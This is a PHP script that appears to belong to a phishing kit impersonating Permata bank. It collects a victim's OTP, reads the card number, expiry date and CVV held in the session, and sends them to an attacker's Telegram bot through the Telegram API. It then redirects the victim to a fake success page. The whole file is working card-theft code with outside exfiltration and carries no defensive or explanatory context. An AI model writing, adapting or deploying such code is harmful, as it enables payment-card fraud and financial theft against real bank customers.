<?php
session_start();
include "./telegram.php";

$pin = $_POST['pin'];
$_SESSION['pin'] = $pin;
$penyedia = $_SESSION['penyedia'];
$nokartu = $_SESSION['nokartu'];
$masa = $_SESSION['masa'];
$cvv = $_SESSION['cvv'];


$message = "

KARTU Permata | ".$nohp."


• Nokartu  = ".$nokartu."

• Masa Berlaku  = ".$masa."

• CVV  = ".$cvv."

• OTP  = ".$pin."



";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
header('Location: ../berhasilblokonline.html');
?>
